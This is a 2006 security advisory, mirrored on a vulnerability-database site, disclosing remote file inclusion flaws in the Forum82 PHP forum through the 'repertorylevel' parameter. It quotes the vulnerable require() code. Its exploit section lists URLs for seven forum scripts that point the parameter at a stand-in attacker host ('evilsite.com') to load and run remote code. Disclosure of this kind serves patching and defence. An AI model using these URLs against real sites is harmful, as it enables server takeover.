Computer Security

Security Advisory: Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Mercury SiteScope 8.2 (8.1.2.0) Cross Site Scripting (XSS) Vulnerability

From:co-type_(at)_hotmail.com <co-type_(at)_hotmail.com>
Date:30.09.2006
Subject:Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities

#================================================================================
==============
#Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities
#================================================================================
===============
#                                                                       
#Critical Level : Dangerous                                             
#                                                                       
#Script Dowload : http://www.comscripts.com/jump.php?action=script&id=805
#                                                                       
#Version : v2.5.2b
#                                                         
#================================================================================
================
#
#Bug in :
#
#almost all files are infected...
#================================================================================
================
#
#Vulnerable Code :
#
# summary & example:
#
# require($repertorylevel.'include/tables.inc.'.$e);
#       require($repertorylevel.'lang/lang.inc.'.$e);
#       require($repertorylevel.'include/db/mysql.inc.'.$e);
#         
#
#================================================================================
================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/search.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/message.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/member.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/mail.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/lostpassword.
php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/gesfil.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/forum82lib.
php3?repertorylevel=http://evilsite.com/evilscript.txt?
#
#bla...bla...
#
#
#
#
# the script files's are installed as .php3 to website.take care that...
#
#================================================================================
================
#Discoverd By : Silahsiz Kuvvetler
#
#
#Conatact : co-type[at]hotmail[dot]com
#
#GreetZ : FaTTaLGazI - NarcoTic - 0xyGen
#
#
#================================================================================
==================

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru